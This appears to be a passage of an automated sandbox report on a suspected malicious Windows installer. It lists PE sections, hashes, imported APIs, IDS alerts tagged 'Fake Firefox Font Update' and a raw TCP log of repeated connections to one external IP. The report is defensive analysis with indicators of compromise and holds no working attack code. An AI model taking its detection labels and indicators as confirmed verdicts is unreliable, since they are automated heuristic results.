                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x991e00x40.rdata
                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x6e0000x3f8.rdata
                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x9a2a40x120.rdata
                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                                                          Sections

                                                                                                                                                                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                                          .text0x10000x6c1390x6c20092efecf5cfa9e863e69713e8451295ebFalse0.5022376264450867data6.489848341668886IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                          .rdata0x6e0000x2de4c0x2e000c796b8ce19f947fe45f2a6998482442bFalse0.27885636039402173data5.073579231118804IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                          .data0x9c0000x17900xa000d375a46a1b65b20341c234446129bcfFalse0.18828125firmware 2005 v9319 (revision 0) \277E V2, 0 bytes or less, at 0 0 bytes , at 0 0 bytes 2.357689911760452IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                          .didat0x9e0000xcc0x20000535babd2373dd0ad324ceba5e2fc7bFalse0.263671875data1.7948113869126585IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                          .wixburn0x9f0000x300x200ab5f7325b234bacb71b5d58f9a9ff40eFalse0.10546875data0.5556939563611969IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                          .rsrc0xa00000x4efc0x500066e987baf579d3084984000d74768671False0.3189453125data5.418748157498877IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                          .reloc0xa50000x5f680x6000bf2489eda548104ef6d2ce4e15cf676fFalse0.7933349609375data6.795414107251252IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                                                          Resources

                                                                                                                                                                                                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                                          RT_ICON0xa01c00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.43185920577617326
                                                                                                                                                                                                                                                                          RT_RCDATA0xa0a680x8dataEnglishUnited States1.75
                                                                                                                                                                                                                                                                          RT_MESSAGETABLE0xa0a700x3d74dataEnglishUnited States0.282418001525553
                                                                                                                                                                                                                                                                          RT_GROUP_ICON0xa47e40x14dataEnglishUnited States1.15
                                                                                                                                                                                                                                                                          RT_VERSION0xa47f80x2c8dataEnglishUnited States0.4705056179775281
                                                                                                                                                                                                                                                                          RT_MANIFEST0xa4ac00x43cXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (1081), with no line terminatorsEnglishUnited States0.5027675276752768

                                                                                                                                                                                                                                                                          Imports

                                                                                                                                                                                                                                                                          DLLImport
                                                                                                                                                                                                                                                                          KERNEL32.dllGetUserDefaultUILanguage, GetUserDefaultLangID, GetSystemDefaultLangID, GetStringTypeW, ReadFile, SetFilePointerEx, CreateProcessW, DuplicateHandle, FreeLibrary, ProcessIdToSessionId, ConnectNamedPipe, SetNamedPipeHandleState, CreateNamedPipeW, OpenProcess, GetProcessId, SetProcessShutdownParameters, LocalFileTimeToFileTime, SetEndOfFile, SetFileTime, GetExitCodeThread, DosDateTimeToFileTime, CompareStringA, SetThreadExecutionState, ReleaseSemaphore, CreateMutexW, GetExitCodeProcess, CreateFileMappingW, MapViewOfFile, UnmapViewOfFile, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, RtlUnwind, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, RaiseException, GetStdHandle, ExitProcess, GetModuleHandleExW, VerifyVersionInfoW, GetFileType, FindFirstFileExW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetStdHandle, GetFileSizeEx, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, DecodePointer, WriteConsoleW, GetComputerNameW, GetSystemTime, VerSetConditionMask, CompareStringW, GetNativeSystemInfo, CreateThread, GetCurrentProcess, CreateSemaphoreW, CreateEventW, ReleaseMutex, ResetEvent, SetEvent, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, MoveFileExW, SetFileAttributesW, RemoveDirectoryW, GetFileAttributesW, FindNextFileW, FindFirstFileW, FindClose, DeleteFileW, GetCurrentDirectoryW, ExpandEnvironmentStringsW, GetProcessHeap, HeapSize, HeapFree, GetDateFormatW, HeapReAlloc, HeapAlloc, GetModuleFileNameW, GetSystemWow64DirectoryW, GetSystemDirectoryW, GetLocalTime, Sleep, SetLastError, GetTempPathW, GetVolumePathNameW, GetTempFileNameW, GetFullPathNameW, CreateDirectoryW, LCMapStringW, WideCharToMultiByte, MultiByteToWideChar, lstrlenW, FormatMessageW, LocalFree, LoadLibraryExW, GetProcAddress, GetModuleHandleW, WaitForMultipleObjects, WaitForSingleObject, HeapSetInformation, GetLastError, lstrlenA, GetCurrentProcessId, GetModuleHandleA, MulDiv, CompareStringOrdinal, GetSystemWindowsDirectoryW, GlobalAlloc, GlobalFree, CopyFileW, LoadResource, LockResource, SizeofResource, FindResourceExA, VirtualAlloc, VirtualFree, SystemTimeToTzSpecificLocalTime, SystemTimeToFileTime, GetTimeZoneInformation, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, WriteFile, SetFilePointer, CreateFileA, CloseHandle, CreateFileW
                                                                                                                                                                                                                                                                          USER32.dllReleaseDC, MonitorFromPoint, MonitorFromWindow, GetDC, GetMonitorInfoW, ShowWindow, IsDialogMessageW, LoadCursorW, LoadBitmapW, SetWindowLongW, GetWindowLongW, GetCursorPos, MessageBoxW, SetWindowPos, CreateWindowExW, UnregisterClassW, RegisterClassW, PostQuitMessage, DefWindowProcW, DispatchMessageW, TranslateMessage, GetMessageW, WaitForInputIdle, IsWindow, PostMessageW
                                                                                                                                                                                                                                                                          GDI32.dllSelectObject, StretchBlt, GetObjectW, DeleteObject, DeleteDC, GetDeviceCaps, CreateCompatibleDC, CreateDCW
                                                                                                                                                                                                                                                                          ADVAPI32.dllCryptHashData, CryptDestroyHash, CryptReleaseContext, OpenProcessToken, AllocateAndInitializeSid, CheckTokenMembership, GetTokenInformation, AdjustTokenPrivileges, IsWellKnownSid, LookupPrivilegeValueW, CryptCreateHash, RegCreateKeyExW, RegDeleteKeyW, RegEnumKeyExW, RegEnumValueW, RegSetValueExW, CryptGetHashParam, QueryServiceStatus, OpenServiceW, OpenSCManagerW, ControlService, CloseServiceHandle, ChangeServiceConfigW, SetEntriesInAclW, DecryptFileW, InitializeAcl, CreateWellKnownSid, ConvertStringSecurityDescriptorToSecurityDescriptorW, ReportEventW, OpenEventLogW, CloseEventLog, RegQueryInfoKeyW, RegDeleteValueW, RegQueryValueExW, GetUserNameW, InitiateSystemShutdownExW, RegOpenKeyExW, RegCloseKey, QueryServiceConfigW, SetNamedSecurityInfoW, InitializeSecurityDescriptor, SetSecurityDescriptorDacl, SetSecurityDescriptorGroup, SetSecurityDescriptorOwner, SetEntriesInAclA, CryptAcquireContextW
                                                                                                                                                                                                                                                                          ole32.dllCoInitializeEx, CoInitialize, CoInitializeSecurity, CoUninitialize, CLSIDFromProgID, CoTaskMemFree, StringFromGUID2, CoCreateInstance
                                                                                                                                                                                                                                                                          OLEAUT32.dllVariantInit, SysAllocString, VariantClear, SysFreeString
                                                                                                                                                                                                                                                                          RPCRT4.dllUuidCreate
                                                                                                                                                                                                                                                                          SHELL32.dllSHGetFolderPathW, CommandLineToArgvW, ShellExecuteExW

                                                                                                                                                                                                                                                                          Possible Origin

                                                                                                                                                                                                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                                                          EnglishUnited States

                                                                                                                                                                                                                                                                          Network Behavior

                                                                                                                                                                                                                                                                          Suricata IDS Alerts

                                                                                                                                                                                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                                          2025-01-09T14:55:26.263610+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849712104.21.80.52443TCP
                                                                                                                                                                                                                                                                          2025-01-09T14:55:27.755836+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849714104.21.80.52443TCP
                                                                                                                                                                                                                                                                          2025-01-09T14:55:29.238873+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849726104.21.80.52443TCP
                                                                                                                                                                                                                                                                          2025-01-09T14:55:59.854963+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.850002104.21.80.52443TCP
                                                                                                                                                                                                                                                                          2025-01-09T14:56:01.130938+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.850010104.21.80.52443TCP
                                                                                                                                                                                                                                                                          2025-01-09T14:56:02.813321+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.850021104.21.80.52443TCP
                                                                                                                                                                                                                                                                          2025-01-09T14:56:04.940883+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.850036104.21.80.52443TCP
                                                                                                                                                                                                                                                                          2025-01-09T14:56:05.860640+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.850042104.21.80.52443TCP
                                                                                                                                                                                                                                                                          2025-01-09T14:56:06.831955+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.850049104.21.80.52443TCP
                                                                                                                                                                                                                                                                          2025-01-09T14:56:08.305767+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.850060104.21.80.52443TCP
                                                                                                                                                                                                                                                                          2025-01-09T14:56:09.807091+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.850068104.21.80.52443TCP
                                                                                                                                                                                                                                                                          2025-01-09T14:56:11.019877+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.850075104.21.80.52443TCP
                                                                                                                                                                                                                                                                          2025-01-09T14:56:24.536355+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.850094104.21.80.52443TCP
                                                                                                                                                                                                                                                                          2025-01-09T14:56:25.966323+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.850095104.21.80.52443TCP
                                                                                                                                                                                                                                                                          2025-01-09T14:56:26.880181+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.850096104.21.80.52443TCP
                                                                                                                                                                                                                                                                          2025-01-09T14:56:27.717800+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.850097104.21.80.52443TCP
                                                                                                                                                                                                                                                                          2025-01-09T14:56:28.857174+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.850098104.21.80.52443TCP
                                                                                                                                                                                                                                                                          2025-01-09T14:56:29.855414+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.850099104.21.80.52443TCP
                                                                                                                                                                                                                                                                          2025-01-09T14:56:31.024826+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.850100104.21.80.52443TCP

                                                                                                                                                                                                                                                                          Network Port Distribution

                                                                                                                                                                                                                                                                          TCP Packets

                                                                                                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:54:07.010178089 CET49673443192.168.2.823.206.229.226
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:54:07.369437933 CET49672443192.168.2.823.206.229.226
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:54:12.728754997 CET49676443192.168.2.852.182.143.211
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:54:15.353708982 CET4967780192.168.2.8192.229.211.108
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:54:16.619369984 CET49673443192.168.2.823.206.229.226
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:54:16.978751898 CET49672443192.168.2.823.206.229.226
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:54:18.612706900 CET4434970323.206.229.226192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:54:18.612967968 CET49703443192.168.2.823.206.229.226
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:25.783243895 CET49712443192.168.2.8104.21.80.52
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:25.783272982 CET44349712104.21.80.52192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:25.783361912 CET49712443192.168.2.8104.21.80.52
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:25.784603119 CET49712443192.168.2.8104.21.80.52
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:25.784616947 CET44349712104.21.80.52192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:26.263520956 CET44349712104.21.80.52192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:26.263609886 CET49712443192.168.2.8104.21.80.52
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:26.265727043 CET49712443192.168.2.8104.21.80.52
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:26.265736103 CET44349712104.21.80.52192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:26.265995026 CET44349712104.21.80.52192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:26.306974888 CET49712443192.168.2.8104.21.80.52
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:26.330156088 CET49712443192.168.2.8104.21.80.52
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:26.330189943 CET49712443192.168.2.8104.21.80.52
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:26.330205917 CET44349712104.21.80.52192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:26.978676081 CET44349712104.21.80.52192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:26.978724957 CET44349712104.21.80.52192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:26.978751898 CET44349712104.21.80.52192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:26.978776932 CET44349712104.21.80.52192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:26.978801966 CET44349712104.21.80.52192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:26.978866100 CET49712443192.168.2.8104.21.80.52
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:26.978898048 CET44349712104.21.80.52192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:26.978912115 CET49712443192.168.2.8104.21.80.52
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:26.979459047 CET44349712104.21.80.52192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:26.979507923 CET49712443192.168.2.8104.21.80.52
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:26.979513884 CET44349712104.21.80.52192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:26.979553938 CET49712443192.168.2.8104.21.80.52
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:26.979558945 CET44349712104.21.80.52192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:26.979825020 CET44349712104.21.80.52192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:26.979849100 CET44349712104.21.80.52192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:26.979907036 CET49712443192.168.2.8104.21.80.52
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:26.979912043 CET44349712104.21.80.52192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:26.979952097 CET49712443192.168.2.8104.21.80.52
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:27.057652950 CET44349712104.21.80.52192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:27.068442106 CET44349712104.21.80.52192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:27.068507910 CET44349712104.21.80.52192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:27.068542957 CET44349712104.21.80.52192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:27.068572998 CET44349712104.21.80.52192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:27.068602085 CET44349712104.21.80.52192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:27.068607092 CET49712443192.168.2.8104.21.80.52
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:27.068607092 CET49712443192.168.2.8104.21.80.52
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:27.068636894 CET44349712104.21.80.52192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:27.068676949 CET44349712104.21.80.52192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:27.068681955 CET49712443192.168.2.8104.21.80.52
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:27.068689108 CET44349712104.21.80.52192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:27.068713903 CET49712443192.168.2.8104.21.80.52
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:27.069412947 CET44349712104.21.80.52192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:27.069444895 CET44349712104.21.80.52192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:27.069470882 CET44349712104.21.80.52192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:27.069489956 CET49712443192.168.2.8104.21.80.52
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:27.069494963 CET44349712104.21.80.52192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:27.069523096 CET44349712104.21.80.52192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:27.069540977 CET49712443192.168.2.8104.21.80.52
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:27.069566965 CET49712443192.168.2.8104.21.80.52
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:27.069569111 CET44349712104.21.80.52192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:27.069577932 CET44349712104.21.80.52192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:27.069614887 CET49712443192.168.2.8104.21.80.52
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:27.070339918 CET44349712104.21.80.52192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:27.070408106 CET44349712104.21.80.52192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:27.070465088 CET49712443192.168.2.8104.21.80.52
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:27.070471048 CET44349712104.21.80.52192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:27.070890903 CET44349712104.21.80.52192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:27.070907116 CET44349712104.21.80.52192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:27.070934057 CET44349712104.21.80.52192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:27.070950985 CET49712443192.168.2.8104.21.80.52
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:27.070955992 CET44349712104.21.80.52192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:27.070981979 CET49712443192.168.2.8104.21.80.52
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:27.070983887 CET44349712104.21.80.52192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:27.071024895 CET49712443192.168.2.8104.21.80.52
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:27.071029902 CET44349712104.21.80.52192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:27.119493008 CET49712443192.168.2.8104.21.80.52
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:27.144792080 CET44349712104.21.80.52192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:27.147308111 CET44349712104.21.80.52192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:27.147389889 CET44349712104.21.80.52192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:27.147454977 CET49712443192.168.2.8104.21.80.52
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:27.147454977 CET49712443192.168.2.8104.21.80.52
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:27.147485971 CET44349712104.21.80.52192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:27.147532940 CET49712443192.168.2.8104.21.80.52
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:27.158257961 CET44349712104.21.80.52192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:27.158303022 CET44349712104.21.80.52192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:27.158318043 CET49712443192.168.2.8104.21.80.52
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:27.158333063 CET44349712104.21.80.52192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:27.158358097 CET49712443192.168.2.8104.21.80.52
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:27.158379078 CET49712443192.168.2.8104.21.80.52
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:27.158680916 CET44349712104.21.80.52192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:27.158734083 CET49712443192.168.2.8104.21.80.52
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:27.159024000 CET44349712104.21.80.52192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:27.159064054 CET49712443192.168.2.8104.21.80.52
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:27.159069061 CET44349712104.21.80.52192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:27.159104109 CET49712443192.168.2.8104.21.80.52
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:27.159110069 CET44349712104.21.80.52192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:27.159179926 CET44349712104.21.80.52192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:27.159270048 CET49712443192.168.2.8104.21.80.52
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:27.159288883 CET44349712104.21.80.52192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:27.159302950 CET49712443192.168.2.8104.21.80.52
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:27.159311056 CET44349712104.21.80.52192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:27.159475088 CET49712443192.168.2.8104.21.80.52
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:27.159480095 CET44349712104.21.80.52192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:27.293931961 CET49714443192.168.2.8104.21.80.52
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:27.293975115 CET44349714104.21.80.52192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:27.294065952 CET49714443192.168.2.8104.21.80.52
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:27.294451952 CET49714443192.168.2.8104.21.80.52
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:27.294472933 CET44349714104.21.80.52192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:27.755768061 CET44349714104.21.80.52192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:27.755836010 CET49714443192.168.2.8104.21.80.52
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:27.775468111 CET49714443192.168.2.8104.21.80.52
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:27.775480986 CET44349714104.21.80.52192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:27.775760889 CET44349714104.21.80.52192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:27.778759956 CET49714443192.168.2.8104.21.80.52
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:27.778788090 CET49714443192.168.2.8104.21.80.52
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:27.778819084 CET44349714104.21.80.52192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:28.079372883 CET44349714104.21.80.52192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:28.079472065 CET44349714104.21.80.52192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:28.079541922 CET49714443192.168.2.8104.21.80.52
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:28.079848051 CET49714443192.168.2.8104.21.80.52
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:28.079864979 CET44349714104.21.80.52192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:28.079878092 CET49714443192.168.2.8104.21.80.52
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:28.079884052 CET44349714104.21.80.52192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:28.778323889 CET49726443192.168.2.8104.21.80.52
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:28.778377056 CET44349726104.21.80.52192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:28.778454065 CET49726443192.168.2.8104.21.80.52
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:28.779099941 CET49726443192.168.2.8104.21.80.52
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:28.779118061 CET44349726104.21.80.52192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:29.238759041 CET44349726104.21.80.52192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:29.238873005 CET49726443192.168.2.8104.21.80.52
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:29.240310907 CET49726443192.168.2.8104.21.80.52
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:29.240329027 CET44349726104.21.80.52192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:29.240622997 CET44349726104.21.80.52192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:29.241461992 CET49726443192.168.2.8104.21.80.52
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:29.241499901 CET49726443192.168.2.8104.21.80.52
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:29.241508007 CET44349726104.21.80.52192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:29.542603970 CET44349726104.21.80.52192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:29.542675972 CET44349726104.21.80.52192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:29.542742014 CET49726443192.168.2.8104.21.80.52
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:29.542877913 CET49726443192.168.2.8104.21.80.52
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:29.542893887 CET44349726104.21.80.52192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:29.542907000 CET49726443192.168.2.8104.21.80.52
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:29.542912960 CET44349726104.21.80.52192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:40.392015934 CET49813443192.168.2.818.244.18.32
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:40.392061949 CET4434981318.244.18.32192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:40.392126083 CET49813443192.168.2.818.244.18.32
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:40.405566931 CET49813443192.168.2.818.244.18.32
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:40.405600071 CET4434981318.244.18.32192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:41.185491085 CET4434981318.244.18.32192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:41.185780048 CET49813443192.168.2.818.244.18.32
